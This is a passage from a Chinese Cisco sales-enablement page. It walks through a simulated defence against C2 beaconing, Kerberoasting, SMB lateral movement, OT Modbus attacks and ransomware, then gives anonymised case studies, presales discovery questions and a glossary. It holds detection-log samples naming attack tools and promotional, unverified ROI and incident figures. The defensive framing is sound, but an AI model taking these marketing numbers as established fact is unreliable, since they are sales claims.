T+32s	SNA → pxGrid → ISE	SNA 通过 pxGrid 向 ISE 发送 ANC 策略: QUARANTINE → 张静 PC 端口 VLAN 切换至隔离 VLAN。 ✅ ISE 端口隔离
T+33s	Secure Firewall	FMC 自动下发规则阻断 C2 IP/域名的所有出站连接。Snort 3 IPS 启用 CS 签名。 ✅ C2 通道被切断
T+35s	XDR	关联分析：张静 PC 标记为 Compromised Host → 触发 Forensics Playbook → 收集内存快照 + 进程树

          SNA ETA Detection
Detection: Encrypted_Traffic_Analytics
JA3_Hash:  72a589da586844d7f0818ce684948eea
Match:     Cobalt_Strike_Malleable_C2 (Talos Rule CS-2024-1847)
Beacon:    60.2s (σ=4.8s)
Confidence:94%
Action: → pxGrid ANC:QUARANTINE → FMC Block Rule #AUTO-2847
        

⛔ C2 通道在建立 35 秒内被发现并切断 — 关键联动: SNA(检测) → pxGrid(共享) → ISE(隔离) → Firewall(阻断) → XDR(取证)。5 个产品在 5 秒内完成协同，无需人工干预。

🔑

D4 Kerberoasting → ISE + SNA 行为检测

DETECT RESPOND

🔴 攻击动作（假设隔离前已开始）

在被隔离之前的短暂窗口中，攻击者执行 Kerberoasting，请求所有 SPN 关联的 TGS 票据准备离线破解。

ATT&CK: T1558.003 - Kerberoasting

🔵 Cisco 响应链

T+20s	SNA	行为基线：张静 PC 10 秒内向 DC 发送 47 个 TGS-REQ（正常≤3/min）。加密类型全部为 RC4_HMAC_MD5（降级攻击）。 ⚠ Kerberos Anomaly
T+22s	ISE	张静 PC (SGT:Finance_User) 大量访问 AD 服务 → 偏离角色基线。触发 pxGrid ANC 强制重认证。 ✅ 会话终止 + 强制 MFA
T+25s	Secure Workload	DC 上的 Agent 检测到异常 Kerberos 服务调用 → 标记进程 `rubeus.exe` 为可疑 → 进程隔离。 ✅ Kerberoasting 工具终止
T+28s	XDR SOAR	自动执行: ① 重置所有已请求 SPN 账号密码 ② 禁用 RC4 加密 ③ 通知 SOC

⛔ Kerberoasting 在 25 秒内被检测并终止 — SOAR 自动重置了受影响服务账号密码，使已获取票据失效。多层检测（SNA 网络 + ISE 身份 + Workload 端点）确保无遗漏。

🔀

D5 SMB 横向移动 → TrustSec SGT + Workload 微隔离

PROTECT DETECT

🔴 攻击动作（假设凭据已破解）

假设攻击者通过其他途径获得域管凭据，尝试通过 SMB/PsExec 横向移动到数据中心应用服务器和 MES 跳板机。

ATT&CK: T1021.002 - SMB/Windows Admin Shares

🔵 Cisco 响应链

T+0s	ISE TrustSec	SGT 策略矩阵: SGT:Finance_User → SGT:MES_Server = DENY。无论凭据是否有效，网络层直接丢弃跨区 SMB 流量。 ✅ 横向移动至 OT 区被阻断
T+0s	Secure Workload	微隔离策略: SMB 445 仅对 SGT:IT_Admin 开放。PsExec 连接被 Agent 拒绝。 ✅ PsExec 连接被拒绝
T+2s	SNA	已隔离主机仍尝试 SMB 扫描 → 升级告警为 Critical
T+3s	ISE → Switch	RADIUS CoA 直接关闭张静 PC 接入端口。 🔌 物理断网

          ISE TrustSec SGACL
Source_SGT:  Finance_User (SGT: 100)
Dest_SGT:    MES_Server   (SGT: 500)
Policy:      SGACL_Deny_All
Result:      DROPPED at ingress switch (hardware-level enforcement)
        

⛔ 横向移动被 Zero Trust 架构彻底阻断 — 纵深防御: TrustSec SGT（网络层）+ Workload 微隔离（主机层）+ ADM 白名单（应用层）构成三重阻断。凭据 ≠ 访问权限。

🏭

D6 OT 渗透 → Firewall + Cyber Vision 阻断

PROTECT DETECT

🔴 攻击动作（假设已到达 IT/OT 边界）

假设攻击者到达 IT/OT 边界，尝试穿越防火墙访问 MES 服务器，并向 PLC 发送恶意 Modbus 指令。

ATT&CK ICS: T0886, T0855

🔵 Cisco 响应链

T+0s	Secure Firewall	IT/OT 边界防火墙执行工业协议 DPI: 仅允许已知的 MES↔ERP 数据同步流量。来自 IT 网段的 Modbus/TCP (502) → 直接丢弃。 ✅ OT 协议穿越被阻断
T+1s	Cyber Vision	OT 内部监控检测到 MES 发起异常 Modbus 功能码（FC 5: Write Single Coil — 不在生产时段执行）。基线显示 MES 从未直接写入 PLC-07。 ⚠ CRITICAL: Unauthorized OT Command
T+2s	CV → Firewall	Cyber Vision 通过 API 联动 FMC，自动下发紧急规则: 隔离 MES 至 OT 维护 VLAN。 ✅ MES 被网络隔离
T+5s	CV + SEA	SOC 通过 SEA 建立紧急远程维护通道，OT 工程师远程检查 PLC 状态 → 确认无恶意逻辑修改。全程录屏。

          Firewall OT DPI + Cyber Vision Alert
# Secure Firewall OT DPI
Rule:     IT_OT_Boundary_Strict
Protocol: Modbus/TCP
Source:   10.10.50.0/24 (IT Zone)
Dest:     172.16.10.0/24 (OT Zone)
Action:   DROP + LOG
Reason:   Industrial protocol from non-OT source

# Cyber Vision 异常检测
Alert:    UNAUTHORIZED_OT_COMMAND
Device:   MES-SVR-01 → PLC-07 (Siemens S7-1500)
Protocol: Modbus FC5 (Write Single Coil)
Baseline: MES → PLC-07 历史仅含 FC3 (Read)
Risk:     98/100
        

⛔ OT 渗透被双重阻断 — Secure Firewall 守护 IT→OT 的「北向」入口，Cyber Vision 监控 OT 内部的「东西向」通信。即使突破边界，工业协议深度解析仍可识别异常指令。

💀

D7 勒索软件引爆 → 全栈联动终止 + 快速恢复

DETECT RESPOND RECOVER

🔴 攻击动作（终极假设）

假设攻击者通过供应链攻击绕过所有防线，在数据中心一台服务器上成功部署勒索软件，开始加密文件并尝试横向传播。

ATT&CK: T1486 - Data Encrypted for Impact

🔵 Cisco 响应链

T+0.5s	Secure Workload	运行时保护: 2 秒内 1,200+ 次文件重命名（加密特征）。进程 `svchost_update.exe` SHA256 不在白名单。 ✅ 恶意进程立即终止
T+1s	SNA	受感染服务器发起大量 SMB 445 连接（横向传播）→ CI 爆表告警
T+1.5s	ISE (pxGrid ANC)	全局联动: ISE 接收双重告警 → ANC:SHUTDOWN → 受感染服务器端口关闭。同子网所有主机 Posture 重评估。 ✅ 感染范围控制在单台服务器
T+3s	Secure Firewall	FMC 启用「勒索应急策略」: ① 阻断所有 SMB 横向 ② 保留监控通道 ③ 限制出站
T+5s	XDR SOAR	恢复 Playbook: ① 快照受感染 VM ② 从干净快照恢复 ③ 全网 IOC 扫描 ④ 通知管理层
T+15min	全栈	服务器从备份恢复完成。IOC 全网扫描确认无二次感染。事件报告自动生成。 ✅ 业务影响时间: ＜15 分钟

          Secure Workload Runtime Protection
Alert:    RANSOMWARE_BEHAVIOR
Process:  svchost_update.exe (PID: 4728)
Behavior: Mass file rename (1,247 files in 1.8s)
Extension_Change: .docx → .locked
SHA256:   NOT in whitelist
Action:   KILL_PROCESS + BLOCK_SYSCALLS + SNAPSHOT_MEMORY
Encrypted_Files: 23 (out of 847,000 total)
Data_Loss: 0.003% (all recoverable from backup)
        

⛔ 勒索软件在引爆 1.5 秒内被终止，23 个文件受影响（全部可恢复）— 对比无防护场景：847,000 文件被加密，停机 72 小时，损失 ¥2,340 万。Cisco 全栈方案将影响降低了 99.997%。

📊 模拟结果对比

❌ 无 Cisco 防护

MTTD: 17 天（行业平均 197 天）
MTTR: 72 小时
Kill Chain 阻断点: 无
攻击成功阶段: 7/7 (100%)
受影响文件: 847,000
OT 产线停机: 72 小时
直接损失: ¥2,340 万
品牌/合规损失: 不可估量

✅ Cisco 全栈防护

MTTD: < 30 秒（SNA ETA）
MTTR: < 15 分钟（SOAR 自动化）
Kill Chain 阻断点: 7 个独立阻断
攻击成功阶段: 0/7 (0%)
受影响文件: 23（最坏情况）
OT 产线停机: 0 小时
直接损失: ≈ ¥0
安全投资 ROI: 2,340 万 / 年度安全投入

30s

平均检测时间 (MTTD)

SNA ETA + 行为分析，相比行业平均减少 99.99%

<15min

平均响应时间 (MTTR)

pxGrid 联动 + SOAR 自动化

独立阻断点

每阶段至少 2 款产品可独立阻断

协同产品数

pxGrid / API / Talos 情报全栈联动

各产品防御贡献统计

产品	参与阶段	独立阻断	辅助检测	核心价值
Secure Access (SSE)	D1, D2	2	0	邮件/DNS/SWG 入口防御
Secure Client	D2	1	1	端点检测 + 网络模块协同
SNA (NDR)	D2-D5, D7	1	5	全局流量可视化 + ETA
ISE	D3-D5, D7	3	1	身份策略 + SGT + ANC 隔离
Secure Firewall	D3, D6, D7	2	1	边界防御 + OT 协议 DPI
Secure Workload	D4, D5, D7	2	1	微隔离 + 运行时保护
Cyber Vision	D6	1	1	OT 深度协议分析
SEA	D6	0	1	安全远程 OT 维护
合计	7 个阶段	12 次	11 次	每阶段平均 3.3 次防御动作

李四看完整个防御模拟回放，长舒一口气。

"如果当时我们已经部署了这套方案……" 他在心里默算：7 个攻击阶段，每一步都有至少 2 道防线。即使攻击者是 APT 级别，也要同时绕过所有层才能成功——而这在数学概率上近乎不可能。

但他也清楚，产品只是工具。真正的关键是如何在组织中落地实施。他翻开了 Cisco 团队准备的行业实施路线图……

从理论到实践，从产品到方案。让我们看看两个真实行业如何分阶段落地 Cisco 安全架构。

行业实施路线图

以 NIST CSF 2.0 为框架，分阶段构建安全能力

从可见到可控，从被动到主动。

🏭 某匿名制造 — 安全转型案例

企业背景：精密制造企业 | 年营收 ¥60 亿 | 4 个生产基地 | 1,200+ 员工

IT/OT 环境：8,000+ IT 终端 | 3,200+ OT 设备 (PLC/HMI/AGV/SCADA) | 2 套 MES 系统

安全现状：传统防火墙 + 基础杀毒 | 无 OT 安全可视化 | IT/OT 网络扁平 | 无 NDR/XDR

合规要求：等保 2.0 三级 | ISO 27001 | 客户(汽车 OEM)供应链安全审计

📋 CSF 2.0 差距评估（实施前）

CSF 功能	目标	当前	差距	关键短板
GV 治理	Tier 3	Tier 1	▼▼	无安全治理委员会，安全预算无规划
ID 识别	Tier 3	Tier 1	▼▼	OT 资产未纳管（3,200 台中仅 40% 已知）
PR 保护	Tier 3	Tier 1.5	▼▼	IT/OT 无隔离，无 NAC，VPN 无 MFA
DE 检测	Tier 3	Tier 0.5	▼▼▼	无 NDR，无 OT 监控，日志未集中
RS 响应	Tier 3	Tier 0.5	▼▼▼	无 IR 预案，无自动化响应
RC 恢复	Tier 3	Tier 1.5	▼▼	有基础备份但无演练，无 OT 恢复预案

Phase 1：看见 — 资产可视化与治理奠基 Month 1-4

GOVERN IDENTIFY

核心目标：建立安全治理组织与流程；实现 IT/OT 全资产可视化；完成风险评估与优先级排序。

Cisco 产品	部署范围	关键配置
Cyber Vision	4 个生产基地的 OT 网络	IOx 传感器部署至 Cisco IE 交换机，被动监听，启用 OT 协议 DPI，建立资产清单与通信基线
ISE	IT 网络接入层	802.1X 认证部署(分批)，设备 Profiling 启用，资产分类与 SGT 标签规划
SNA	核心/汇聚层	NetFlow 采集启用，7 天行为基线学习，初始告警调优

治理措施：

成立安全治理委员会（CTO 李四任主席，IT/OT/合规三方参与）
制定安全方针政策，定义风险偏好与容忍度
完成供应链安全评估（关键供应商安全问卷）
制定 3 年安全投资计划（CAPEX + OPEX）

100%

IT 资产可视化

ISE Profiling

95%

OT 资产可视化

Cyber Vision 发现 3,040/3,200

1 份

风险评估报告

基于 CSF ID.RA

完成

治理框架

安全委员会 + 方针 + 流程

Phase 2：筑墙 — 零信任与纵深防御 Month 4-9

PROTECT

核心目标：IT/OT 网络分段与边界强化；实施零信任接入控制；部署端点保护与远程访问安全。

Cisco 产品	部署范围	关键配置
Secure Firewall	IT/OT 边界 × 4 基地	区域划分(IT/OT/DMZ)，工业协议 DPI，IPS 启用，EVE
ISE TrustSec	全网	10 个 SGT 组，SGACL 矩阵定义，802.1X 全面推进
Secure Client	全部终端 + 远程用户	ZTNA 模式 + Umbrella + NVM + Posture
Secure Workload	数据中心服务器	ADM 学习 → 微隔离策略 → Enforce 模式
SEA	OT 远程维护通道	替换传统 VPN，per-session 授权 + 会话录制

4 套

IT/OT 边界防火墙

工业协议 DPI + IPS

10 组

SGT 策略组

细粒度 SGACL 矩阵

100%

端点覆盖率

Secure Client 全终端

85%

微隔离覆盖

核心应用 Enforce

Phase 3：感知 — 检测响应闭环 Month 9-14

DETECT RESPOND

核心目标：建立 IT/OT 统一 SOC；实现自动化检测与响应；部署 XDR/SIEM 实现多源关联。

Cisco 产品	升级/新增	关键配置
SNA	升级为全量 NDR	ETA 启用，IT/OT 双域分析，自定义检测规则，与 Cyber Vision 关联
Splunk (XDR/SIEM)	新增	接入所有产品日志，自定义关联规则 50+，SOAR Playbook 20+
pxGrid 集成	全栈联动	ISE ↔ SNA ↔ Firewall ↔ Workload 实时情报共享，ANC 自动隔离
Secure Access	新增 SSE	统一 DNS/SWG/CASB/DLP 策略，远程用户安全接入

SOC 运营建设：

组建 3 人安全运营团队（1 SOC 分析师 + 1 OT 安全工程师 + 1 安全架构师）
定义 Tier 1/2/3 告警处理流程与 SLA
建立 20+ SOAR 自动化 Playbook（覆盖常见场景）
月度 Purple Team 演练（攻防对抗）

<5min

MTTD

从无检测到分钟级

<30min

MTTR

自动化 + 人工确认

50+

关联检测规则

覆盖 ATT&CK Top 40

20+

SOAR Playbook

自动化处置覆盖 60%

Phase 4：进化 — 持续改进与韧性提升 Month 14-18

GOVERN RECOVER

核心目标：建立业务连续性与灾难恢复体系；完善安全度量与持续改进机制；通过合规审计。

活动	详情	产品支撑
BCP/DR 演练	模拟勒索软件场景，执行 OT 产线恢复演练，验证 RTO(4h)/RPO(1h)	Workload 快照 + SOAR
安全度量体系	12 个 KPI 仪表盘，月度安全运营报告	Splunk + SNA 报表
CSF 成熟度复评	第三方 CSF 2.0 成熟度评估，对比 Phase 1 基线	全栈数据输出
等保 2.0 认证	完成等保三级评估，提交审计材料	全栈合规报告

Tier 3

CSF 成熟度

从 Tier 0.5~1.5 全域提升

通过

等保 2.0 三级

满足所有技术与管理要求

4h / 1h

RTO / RPO

经演练验证

12 个

安全 KPI

持续度量与改进

📈 量化成果（18 个月后）

指标	实施前	实施后	改善
IT 资产可视化率	~70%	100%	+30%
OT 资产可视化率	~40%	98%	+58%
MTTD	未知（无检测）	< 5 分钟	从无到有
MTTR	~48 小时	< 30 分钟	-98.9%
IT/OT 网络隔离	扁平网络	3 区 3 域 + SGT 微隔离	架构重建
CSF 平均成熟度	Tier 0.9	Tier 3.0	+2.1 Tier
年度安全事件数	12 起（含 3 起严重）	2 起（0 起严重）	-83%
OT 产线因安全停机	72 小时/年	0 小时	-100%
安全投资 ROI	—	年化 320%	避免损失 ¥2,300 万+/年

"18 个月前，我们连自己有多少 OT 设备都说不清。今天，我可以在一个仪表盘上看到整个企业的安全态势，并且知道每一个告警背后都有自动化响应在兜底。"

— 李四，某匿名 IT 总监

🏦 某匿名银行 — 安全转型案例

企业背景：区域性城商行 | 总资产 ¥3,800 亿 | 120+ 网点 | 4,500 员工

IT 环境：15,000+ 终端 | 2 个数据中心(同城双活) | 200+ 业务系统 | 混合云

安全现状：传统边界安全 (FW+IDS+WAF) | 无 ZTNA | 数据中心东西向无监控

合规要求：等保 2.0 四级 | 银保监会金融数据安全指引 | PCI DSS | 个人信息保护法

🔍 核心安全挑战

🏢 分支网点安全

120+ 网点安全策略不一致，远程运维依赖传统 VPN，网点设备缺乏 NAC 控制。

🔒 数据安全合规

客户金融数据分散在 200+ 系统，数据流转路径不清晰，DLP 策略碎片化。

☁️ 混合云安全

私有云与公有云安全策略割裂，东西向流量盲区大，微隔离覆盖率＜20%。

Phase 1：统一管控 + 边界强化 Month 1-6

GOVERN IDENTIFY PROTECT

核心目标：建立统一安全管控平台，实现 120+ 网点策略一致性；升级边界防御能力；完成全网资产盘点与数据分类分级。

Cisco 产品	部署范围	关键配置
Secure Firewall	总行 + 分行数据中心	FMC 集中管理 120+ 网点防火墙策略，SSL 解密，IPS/Malware
ISE	总行 + 分行全网	802.1X/MAB 接入认证，Profiling，访客管理
Secure Access	远程办公 + 移动员工	DNS 安全 + SWG + CASB + 初步 DLP，ZTNA 替代传统 VPN
Secure Client	全部终端	ZTNA + Umbrella + NVM + Posture
SNA	核心网络	NetFlow 基线学习，初始告警调优，ETA 试点

120+

统一管控网点

FMC 集中策略推送

100%

NAC 覆盖率

ISE 全网接入控制

完成

数据分类分级

4 级分类 × 200+ 系统

ZTNA

远程接入升级

替代传统 VPN

Phase 2：零信任 + 微隔离深化 Month 6-12

PROTECT DETECT

核心目标：数据中心东西向流量微隔离；混合云统一安全策略；金融数据 DLP 全面覆盖。

Cisco 产品	部署范围	关键配置
Secure Workload	双数据中心 + 公有云	ADM 自动学习 200+ 应用依赖 → 微隔离 → 分批 Enforce
ISE TrustSec	全网	15+ SGT 标签组（按业务线/数据级别），SGACL 矩阵覆盖核心业务
Secure Access (DLP)	全流量	DLP 策略升级: 银行卡号/身份证/客户资料 inline 检测 + 阻断
SNA (升级)	全量 NDR	ETA 全面启用，数据中心东西向全覆盖，与 Workload 联动

95%

微隔离覆盖率

核心应用全部 Enforce

15+

SGT 策略组

按业务线 + 数据级别

100%

DLP 覆盖率

金融敏感数据全面保护

100%

东西向可视化

SNA + Workload 双重监控

Phase 3：检测响应闭环 + 持续合规 Month 12-18

DETECT RESPOND RECOVER GOVERN

核心目标：建立金融级 SOC 运营能力；实现自动化事件响应与合规报告；通过等保四级 + PCI DSS 审计。

活动	详情	产品支撑
Splunk XDR/SOAR	金融行业检测规则（信用卡欺诈关联/异常交易/内部威胁），30+ Playbook	Splunk + 全栈 API
pxGrid 全栈联动	ISE ↔ SNA ↔ FMC ↔ Workload 实时威胁情报共享	pxGrid Hub
金融 Red Team 演练	模拟 SWIFT 攻击/ATM 网络渗透/内部泄密等场景	全栈验证
BCP/DR 双活演练	模拟主数据中心故障，验证同城切换 RTO(15min)/RPO(0)	Firewall HA + Workload
等保四级 + PCI DSS	完成评估整改，提交审计材料	全栈合规报告

<2min

MTTD

金融级实时检测

<15min

MTTR

SOAR 自动化 + 人工确认

通过

等保 2.0 四级

金融行业最高要求

通过

PCI DSS v4.0

卡数据环境全面合规

📈 量化成果（18 个月后）

指标	实施前	实施后	改善
网点安全策略一致性	~45%	100%	+55%
NAC 终端准入覆盖	总行仅部分	100% (15,000+ 终端)	全覆盖
数据中心微隔离	<20%	95%	+75%
MTTD	~24 小时	< 2 分钟	-99.86%
MTTR	~8 小时	< 15 分钟	-96.9%
年度安全事件	28 起（含 5 起数据泄露）	4 起（0 起数据泄露）	-86%
合规审计发现项	47 项不合规	2 项建议改善	-96%
远程办公安全接入	传统 VPN（无 MFA）	ZTNA + 持续验证	架构升级
安全运营效率	5 人 200 告警/天	3 人 50 告警/天（其余自动化）	人效 5×

"过去我们的安全是'补丁式'的——哪里出问题补哪里。现在有了 NIST CSF 框架和 Cisco 全栈方案，我们第一次实现了'体系化'安全建设。最让我欣慰的是，监管审计从'整改通知'变成了'优秀案例'。"

— 张三，某匿名银行首席信息安全官 (CISO)

Sales Enablement

售前发现问题库

基于 NIST CSF 2.0 六大功能设计的开放式提问，帮助 SE/AM 快速定位客户痛点并关联 Cisco 产品机会。

💡 Golden Circle — WHY → HOW → WHAT

Simon Sinek 的黄金圈法则应用于安全售前：

WHY（为什么）— 了解业务背景、合规驱动、风险事件。
"贵司最近一次安全审计中，监管机构关注的首要问题是什么？"
HOW（怎么做）— 了解现有流程、工具链、团队结构。
"目前团队如何在 IT 和 OT 之间协调威胁响应？"
WHAT（做什么）— 引导能力差距，关联产品。
"如果能在 15 分钟内自动隔离受感染 PLC 网段，对产线意味着什么？"

🎯 MEDDPICC 关键要素映射

Metrics	"目前 MTTD 和 MTTR 分别是多少？"
Economic Buyer	"安全预算最终由谁审批？CISO 还是 CFO？"
Decision Criteria	"选择方案时首要考量是合规覆盖还是 TCO？"
Decision Process	"POC 后还需经过哪些审批环节？"
Paper Process	"贵司采购周期一般多长？是否需要招投标？"
Identify Pain	"过去 12 个月最让团队头疼的安全事件是？"
Champion	"团队中谁最关注这个问题并愿意推动变化？"
Competition	"目前是否在评估其他厂商方案？"

🏭 制造业发现问题（某匿名类客户）

每个问题标注 CSF 功能映射与潜在产品机会。建议按 GV → ID → PR → DE → RS → RC 顺序推进对话。

#	CSF	圈层	开放式问题	产品机会	MEDDPICC
1	GV	WHY	"贵司的工业网络安全是由 IT 部门、OT 部门还是联合团队负责？汇报线如何设置？"	ISE, Cyber Vision	Champion
2	GV	WHY	"过去两年中，是否因为安全事件或监管要求调整过安全策略？触发因素是什么？"	全线（合规驱动）	Identify Pain
3	ID	WHY	"目前是否有完整的 OT 资产清单？包括 PLC 固件版本、通信协议、上下游依赖？更新频率如何？"	Cyber Vision, Workload	Metrics
4	ID	HOW	"贵司如何进行 OT 风险评估？是否量化过一次产线停机的直接与间接损失？"	Cyber Vision, SNA	Economic Buyer
5	PR	HOW	"IT 与 OT 产线之间的网络分段策略是如何实施的？是否使用了 DMZ？第三方如何接入？"	Firewall, ISE, SEA	Identify Pain
6	PR	HOW	"工程师远程维护 PLC 或 SCADA 时使用什么方式？是否有会话录像与审批流程？"	SEA, ISE	Champion
7	DE	HOW	"目前是否能检测 OT 协议层异常（如 Modbus 功能码篡改、CIP 未授权写入）？还是仅依赖 IT 侧 IDS？"	Cyber Vision, SNA, FW	Identify Pain
8	DE	WHAT	"如果有人在凌晨 3 点从 MES 向 PLC 下发固件更新，贵司能在多久内发现？会触发什么告警？"	CV + SNA + XDR	Metrics (MTTD)
9	RS	HOW	"发现 OT 侧安全事件后，当前响应流程是什么？是否有预定义 Playbook？IT 和 OT 如何协同？"	XDR, ISE + pxGrid	Decision Process
10	RS	WHAT	"是否能在不停产的情况下隔离受感染网段？最快的隔离手段需要多长时间？"	ISE, Firewall, CV	Metrics (MTTR)
11	RC	HOW	"产线遭受攻击后的恢复计划是什么？PLC 程序和 HMI 配置是否有离线备份与验证机制？"	CV, Workload	Identify Pain
12	RC	WHAT	"如果希望将产线恢复时间缩短 50%，您认为最大的瓶颈在哪里？"	全线（整体架构升级）	Economic Buyer

🏦 金融业发现问题（某匿名银行类客户）

聚焦数据安全、合规审计、零信任转型与混合云场景。

#	CSF	圈层	开放式问题	产品机会	MEDDPICC
1	GV	WHY	"贵行网络安全治理架构中，CISO 向谁汇报？安全预算占 IT 总预算比例？未来 3 年趋势？"	全线（战略级）	Economic Buyer
2	GV	WHY	"满足银保监会、等保 2.0、个人信息保护法等合规方面，目前最大挑战是什么？"	ISE, Workload	Identify Pain
3	ID	WHY	"贵行的敏感数据分类分级做到什么程度？是否清楚核心银行数据在哪些系统间流转？"	Workload, SNA	Metrics
4	ID	HOW	"混合云环境下，资产台账更新频率能做到多快？是否包括容器和微服务？"	Workload, Secure Access	Decision Criteria
5	PR	HOW	"贵行的零信任转型进展到哪个阶段？是否已实现基于身份和设备信任等级的动态访问控制？"	ISE, Client, Secure Access	Champion
6	PR	HOW	"分支网点和远程员工访问核心系统时，安全策略是否一致？如何保障 SaaS 应用的数据防泄漏？"	Secure Access, Client, FW	Identify Pain
7	DE	HOW	"目前 SOC 团队规模是多少？每天处理多少告警？误报率大约在什么水平？"	XDR, SNA	Metrics
8	DE	WHAT	"如果内部员工在核心系统上执行异常数据导出（如非工作时间批量查询客户信息），能在多久内检测到？"	SNA, Workload, XDR	MTTD
9	RS	HOW	"安全事件的升级路径和沟通机制是什么？是否定期进行红蓝对抗？上次是什么时候？"	XDR, Talos IR	Decision Process
10	RS	WHAT	"发现账户异常后，自动冻结/降权的能力如何？是否能联动 IAM 实现实时响应？"	ISE + pxGrid, XDR	MTTR
11	RC	HOW	"核心系统的 RTO 和 RPO 分别是多少？灾备切换是否经过安全验证（确认备份未被感染）？"	Workload, SNA	Economic Buyer
12	RC	WHAT	"如果能将勒索软件恢复时间从数天缩短到数小时，对贵行客户信任和监管评级意味着什么？"	全线（端到端弹性）	Economic Buyer

🗺️ 推荐对话流程（首次会议 30 分钟）

WHY 层（10 分钟）

GV + ID 问题，了解业务背景和风险认知

HOW 层（10 分钟）

PR + DE 问题，了解现有架构与工具链

WHAT 层（5 分钟）+ 总结（5 分钟）

1-2 个场景化问题激发痛感；确认理解、约定下一步

对话技巧

✅ 使用"假如"句式激发想象力："假如攻击者已经在内网潜伏了 30 天…"

✅ 用数字量化痛点："每分钟停机损失约 ¥XX 万…"

✅ 倾听 > 讲述：70% 时间留给客户

❌ 避免首次会议就展示产品功能参数

❌ 避免批评客户现有方案，改为"如果有机会优化，您会优先改进哪方面？"

✅ 每次会后用 MEDDPICC 模板记录发现

结语：让"看不见"成为过去

NIST CSF 2.0 的六大功能不仅是合规框架——它们定义了安全运营中"你看不见什么"的六个维度。Cisco 安全架构的使命，是在每一个维度照亮盲区。

👁️ 治理：看不见"谁负责"

当安全职责模糊时，每个环节都可能成为盲区。

Cisco：ISE 角色治理 + XDR 统一仪表盘

🔍 识别：看不见"有什么"

你无法保护你不知道存在的资产。85% 的 OT 漏洞出现在未记录的设备上。

Cisco：Cyber Vision 100% OT 发现 + Workload 依赖映射

🛡️ 保护：看不见"谁在访问"

过度信任的边界和扁平网络让攻击者畅通无阻。

Cisco：ISE TrustSec + Firewall 微分段 + SEA

🔔 检测：看不见"发生了什么"

如果 MTTD 以天计算，攻击者就有充足时间完成杀伤链。

Cisco：SNA 行为基线 + Cyber Vision OT DPI + XDR 关联

⚡ 响应：看不见"如何处置"

发现威胁却无法快速行动，等于看着火灾蔓延却找不到灭火器。

Cisco：XDR Playbook + pxGrid 联动 ISE/FW = 秒级遏制

🔄 恢复：看不见"能否回来"

没有经过验证的恢复计划，RTO 只是纸上的数字。

Cisco：Workload 完整性验证 + CV 配置基线 + SNA 恢复监控

📌 四大核心要点

1️⃣ 框架先行，产品跟进
以 NIST CSF 2.0 评估差距，然后选择填补差距的最优产品组合。

2️⃣ IT/OT 融合是必然
攻击者不区分 IT 和 OT——防御者也不应该。Cisco 通过 pxGrid、XDR 实现统一运营。

3️⃣ 自动化是 MTTR 的关键
从"人找问题"到"问题找人"，通过 SOAR 将 MTTR 从小时级压缩到分钟级。

4️⃣ 安全是业务使能器
安全投资的最终衡量不是阻止了多少攻击，而是为业务创造了多少信任和弹性。

📖 后记：18 个月后的某匿名

李四站在全新的安全运营中心大屏前，屏幕上清晰地显示着三个数字：

4.2 分钟

MTTD

从 17 天 → 4.2 分钟

8.7 分钟

MTTR

从 6 小时 → 8.7 分钟

非计划停机

过去 12 个月零安全事件停机

"去年那次事故让我们明白，安全不是 IT 的成本中心，而是制造业的生命线。" 李四在公司年度总结会上说道。

—— 这不仅是某匿名的故事，也可以是你的客户的故事。

🚀 准备好与客户开启安全对话了吗？

🔴 回顾攻击模拟 🟢 回顾防御模拟 💬 查看发现问题 🛡️ 查看产品映射

Appendix A

术语表 Glossary

本文涉及的关键安全术语速查。

缩写	英文全称	中文翻译	简要说明
APT	Advanced Persistent Threat	高级持续性威胁	由国家级或有组织攻击者发起的长期、隐蔽的定向攻击
ATT&CK	Adversarial Tactics, Techniques & Common Knowledge	对抗战术、技术和公共知识库	MITRE 维护的攻击行为知识库，分为 Enterprise 和 ICS 矩阵
C2 / C&C	Command and Control	命令与控制	攻击者用于远程操控被入侵系统的通信通道
CASB	Cloud Access Security Broker	云访问安全代理	监控和控制组织对 SaaS/IaaS 应用的使用，提供 DLP 和合规能力
CIP	Common Industrial Protocol	通用工业协议	Rockwell/Allen-Bradley 设备使用的工业通信协议
CSF	Cybersecurity Framework	网络安全框架	NIST 发布的网络安全最佳实践框架，当前版本为 2.0
CVE	Common Vulnerabilities and Exposures	通用漏洞和暴露	公开已知安全漏洞的标准化编号系统
DLP	Data Loss Prevention	数据防泄漏	检测和阻止敏感数据未经授权外传的技术
DMZ	Demilitarized Zone	隔离区 / 非军事区	IT 与 OT（或内外网）之间的缓冲网络区域
DPI	Deep Packet Inspection	深度包检测	对网络流量内容（而非仅头部）进行分析的技术
EDR	Endpoint Detection and Response	终端检测与响应	监控终端行为、检测威胁并支持响应的安全技术
ETA	Encrypted Traffic Analytics	加密流量分析	Cisco 独创技术，无需解密即可识别加密流量中的恶意活动
FMC	Firewall Management Center	防火墙管理中心	Cisco Secure Firewall 的集中管理平台
FTD	Firepower Threat Defense	—	Cisco 下一代防火墙操作系统，统一防火墙 + IPS + VPN
HMI	Human-Machine Interface	人机界面	操作员监控和控制工业设备的图形化界面
ICS	Industrial Control Systems	工业控制系统	用于管理工业过程的计算机系统，包括 SCADA、DCS、PLC 等
IoC	Indicators of Compromise	入侵指标	用于识别系统可能已被入侵的技术证据（IP、哈希、域名等）
ISE	Identity Services Engine	身份服务引擎	Cisco 的网络准入控制与策略管理平台
MES	Manufacturing Execution System	制造执行系统	连接 ERP 与车间设备、管理生产过程的系统
MTTD	Mean Time to Detect	平均检测时间	从威胁出现到被发现的平均时长
MTTR	Mean Time to Respond	平均响应时间	从检测到威胁到完成遏制的平均时长
NAC	Network Access Control	网络准入控制	控制设备和用户接入网络的安全技术
NDR	Network Detection and Response	网络检测与响应	基于网络流量分析的威胁检测和响应平台
NGFW	Next-Generation Firewall	下一代防火墙	集成应用识别、IPS、URL 过滤等功能的防火墙
OT	Operational Technology	运营技术	用于监控和控制物理设备与工业过程的硬件和软件
PLC	Programmable Logic Controller	可编程逻辑控制器	工业环境中控制机电设备的专用计算机
pxGrid	Platform Exchange Grid	平台信息交换网格	Cisco 的跨产品安全上下文共享协议
RPO	Recovery Point Objective	恢复点目标	灾难发生后可接受的最大数据丢失量（时间度量）
RTO	Recovery Time Objective	恢复时间目标	灾难发生后恢复业务运行的目标时间
SASE	Secure Access Service Edge	安全访问服务边缘	将 SD-WAN 和安全服务融合的云架构（Gartner 定义）
SCADA	Supervisory Control and Data Acquisition	数据采集与监控系统	远程监控和控制工业设施的系统架构
SEA	Secure Equipment Access	安全设备接入	Cisco 的工业设备零信任远程访问解决方案
SGT	Scalable Group Tag	可扩展组标签	Cisco TrustSec 使用的逻辑分组标签，用于策略执行
